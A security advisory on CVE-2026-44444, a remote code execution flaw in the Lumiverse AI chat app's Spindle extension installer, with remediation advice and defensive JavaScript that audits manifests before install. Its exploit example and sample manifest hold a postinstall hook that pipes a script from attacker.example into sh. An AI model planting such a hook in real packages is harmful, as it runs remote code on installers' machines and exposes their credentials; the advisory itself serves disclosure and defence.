Overview
A critical remote code execution vulnerability (CVSS 9.1) has been disclosed in Lumiverse, a full-featured AI chat application. Tracked as CVE-2026-44444, the flaw affects the Spindle extension build pipeline in all versions prior to 0.9.7 and allows a malicious extension to execute arbitrary code on the system running Lumiverse during the extension installation process.
This vulnerability is distinct from the related CVE-2026-44451 (TSX sandbox escape) — both were patched in the same 0.9.7 release but exploit different parts of the extension processing pipeline.
Vulnerability Details
| Detail | Value |
|---|---|
| CVE | CVE-2026-44444 |
| CVSS Score | 9.1 (Critical) |
| Type | RCE via Package Install Lifecycle Scripts |
| Attack Vector | Malicious extension package.json |
| Authentication | Low — any user with permission to install extensions |
| Affected Product | Lumiverse AI Chat — Spindle Extension Pipeline |
| Fixed Version | 0.9.7 |
Technical Root Cause
The Spindle Extension Build Pipeline
Lumiverse supports a plugin system called Spindle, which allows third-party developers to package and distribute extensions that add functionality to the AI chat interface. When a user installs a Spindle extension, the build pipeline processes the extension package — including running bun install to resolve the extension's npm dependencies.
The Vulnerable Pattern
The critical flaw is a security scan ordered after code execution:
[Spindle Install Flow — Vulnerable]
1. Receive extension package
2. bun install ← lifecycle scripts execute HERE (no --ignore-scripts)
3. assertSafeBackendBundle ← security scan runs AFTER (too late)
4. Load extension
The bun install command is invoked without the --ignore-scripts flag. Any preinstall, install, or postinstall script defined in the extension's own package.json is therefore executed by Bun during the install step. (Unlike npm, Bun does not by default run lifecycle scripts of installed dependencies; it runs them only for packages the root package.json lists under trustedDependencies or that appear on Bun's built-in allowlist. That default offers no protection here, because the extension author controls the root package.json and can add whatever they like to trustedDependencies.)
The static backend safety scanner (assertSafeBackendBundle) runs as a subsequent step, after bun install has already completed and any malicious lifecycle scripts have already executed.
Exploit Scenario
A threat actor creates a malicious Lumiverse extension and distributes it via a public or private package registry. The extension's package.json includes a lifecycle hook:
```json
{
  "name": "lumiverse-helpful-extension",
  "version": "1.0.0",
  "scripts": {
    "postinstall": "curl https://attacker.example/payload.sh | sh"
  }
}
```
When a Lumiverse user installs this extension:
- Spindle calls `bun install` on the extension package
- Bun executes the `postinstall` script automatically as part of the install
- The malicious script runs with the permissions of the Lumiverse process
- `assertSafeBackendBundle` scans the extension code, but the payload has already executed
The security scan never detects the attack because the postinstall directive is standard npm package metadata, not JavaScript bundled into the extension's own code.
Impact
Successful exploitation provides:
- Arbitrary command execution on the host running Lumiverse, with OS permissions of the Lumiverse server process
- Full filesystem access to all directories readable by the Lumiverse process
- Access to environment variables including API keys, database credentials, and authentication tokens
- Network access to internal services reachable from the Lumiverse host
- Persistent access if the malicious script establishes a backdoor or scheduled task
In cloud or self-hosted Lumiverse deployments, this vulnerability could lead to full server compromise from a single extension installation.
Relationship to CVE-2026-44451
Both CVE-2026-44444 and CVE-2026-44451 affect Lumiverse's extension processing pipeline in versions prior to 0.9.7:
| | CVE-2026-44444 | CVE-2026-44451 |
|---|---|---|
| Vector | Package install lifecycle scripts | TSX dynamic function sandbox bypass |
| Stage | Extension install (build time) | Extension runtime (render time) |
| Execution context | Bun package manager → OS shell | Browser JavaScript context |
| CVSS | 9.1 | 9.3 |
| Fix | Add --ignore-scripts to bun install | Replace dynamic function sandbox |
Organizations should patch to 0.9.7 to address both vulnerabilities simultaneously.
Remediation
Upgrade
Upgrade to Lumiverse 0.9.7 immediately. The fix adds the --ignore-scripts flag to the bun install invocation and reorders the pipeline so security scanning occurs before any code execution.
Workarounds (if unable to upgrade immediately)
- Disable extension installation via Lumiverse's administration settings until the patch can be applied
- Restrict extension sources to an internal registry of pre-vetted extensions if your deployment supports this
- Run Lumiverse with a restricted service account that limits filesystem and network access to reduce blast radius
Defense-in-Depth for Extension Pipelines
The root cause here is a general architectural anti-pattern — executing code before completing security validation. For any platform with a plugin/extension system:
- Always pass `--ignore-scripts` (or the equivalent `--no-scripts`) to package managers when installing untrusted code
- Security scanning must precede execution, not follow it
- Sandbox extension installation in an isolated process or container with restricted host access
- Validate extension signatures before installation to prevent tampered packages
- Apply least privilege — the extension installer process should not have access to production credentials or sensitive filesystem paths
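As an added illustration (not Spindle's code, and not taken from the Lumiverse project), the following Node-runnable JavaScript contrasts the vulnerable ordering described under The Vulnerable Pattern with the hardened ordering the checklist above calls for: audit the extension manifest first, refuse anything that declares install-time hooks or trustedDependencies, and only then invoke the package manager with --ignore-scripts. The function names (auditManifest, installExtension, buildInstallCommand), the sample manifests and the recording runner are illustrative assumptions; the runner is injected so nothing is actually installed on the host.

```javascript
// Added example, not Spindle/Lumiverse code. Demonstrates scan-before-execute
// ordering plus --ignore-scripts for an untrusted extension install.
// auditManifest/installExtension/buildInstallCommand are hypothetical names.

// Hooks that npm-compatible clients (Bun included, for the root package)
// execute during `install` unless scripts are suppressed.
const INSTALL_LIFECYCLE_HOOKS = [
  "preinstall", "install", "postinstall",
  "preprepare", "prepare", "postprepare",
];

// Returns a list of findings; an empty list means the manifest is clean.
function auditManifest(manifest) {
  const findings = [];
  const scripts = manifest.scripts || {};
  for (const hook of INSTALL_LIFECYCLE_HOOKS) {
    if (Object.prototype.hasOwnProperty.call(scripts, hook)) {
      findings.push(`lifecycle hook "${hook}" would run on install: ${scripts[hook]}`);
    }
  }
  // Bun only runs dependency lifecycle scripts for packages the root manifest
  // names in trustedDependencies; an extension author controls that list.
  const trusted = manifest.trustedDependencies;
  if (Array.isArray(trusted) && trusted.length > 0) {
    findings.push(`trustedDependencies re-enables dependency scripts for: ${trusted.join(", ")}`);
  }
  return findings;
}

// The single-flag fix: never let the package manager run hooks for untrusted input.
function buildInstallCommand() {
  return ["bun", "install", "--ignore-scripts"];
}

// Vulnerable ordering, kept for contrast: install (hooks enabled), then scan.
function installExtensionVulnerable(manifest, runCommand) {
  runCommand(["bun", "install"]);            // hooks execute here
  const findings = auditManifest(manifest);  // too late to matter
  if (findings.length > 0) throw new Error(findings.join("; "));
  return { installed: true, findings: [] };
}

// Fixed ordering: audit first, refuse on findings, then install with hooks disabled.
function installExtension(manifest, runCommand) {
  const findings = auditManifest(manifest);
  if (findings.length > 0) return { installed: false, findings };
  runCommand(buildInstallCommand());
  return { installed: true, findings: [] };
}

// Constructed sample manifests: one mirrors the advisory's exploit scenario.
const MALICIOUS_MANIFEST = {
  name: "lumiverse-helpful-extension",
  version: "1.0.0",
  scripts: { postinstall: "curl https://attacker.example/payload.sh | sh" },
};
const CLEAN_MANIFEST = {
  name: "lumiverse-clean-extension",
  version: "1.0.0",
  dependencies: { "left-pad": "^1.3.0" },
};

// Recording runner so the ordering is observable without touching the host.
function makeRecorder() {
  const calls = [];
  return { calls, run: (argv) => { calls.push(argv.join(" ")); } };
}

// Runs both orderings against both manifests and reports what each did.
function demo() {
  const vuln = makeRecorder();
  let vulnError = null;
  try { installExtensionVulnerable(MALICIOUS_MANIFEST, vuln.run); } catch (e) { vulnError = e.message; }

  const fixed = makeRecorder();
  const fixedResult = installExtension(MALICIOUS_MANIFEST, fixed.run);

  const clean = makeRecorder();
  const cleanResult = installExtension(CLEAN_MANIFEST, clean.run);

  return {
    vulnCalls: vuln.calls, vulnError,
    fixedCalls: fixed.calls, fixedResult,
    cleanCalls: clean.calls, cleanResult,
  };
}

if (typeof require !== "undefined" && require.main === module) {
  console.log(JSON.stringify(demo(), null, 2));
}
```

In the vulnerable path the recorder shows a plain `bun install` being issued before the audit ever runs, which is exactly the window the advisory describes; in the fixed path the malicious manifest never reaches the package manager at all, and the clean one is installed with `--ignore-scripts`. Refusing manifests that declare hooks, rather than merely suppressing them, is deliberate: with `--ignore-scripts` those hooks would not run anyway, so an extension that depends on them is broken either way, and a clear rejection up front is more useful than a silent partial install. A real pipeline would still run the static bundle scanner after this step, before loading the extension.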
Key Takeaways
- CVSS 9.1 Critical — a single malicious extension installation leads to full RCE on the Lumiverse host
- `--ignore-scripts` is not optional when processing untrusted packages; omitting it is a well-documented supply chain attack vector
- Scanning after execution provides no real protection; the scan must happen first
- This pattern appears across AI application platforms — developers building similar extension systems should audit their install pipelines
- Patch to 0.9.7 closes both CVE-2026-44444 and CVE-2026-44451 simultaneously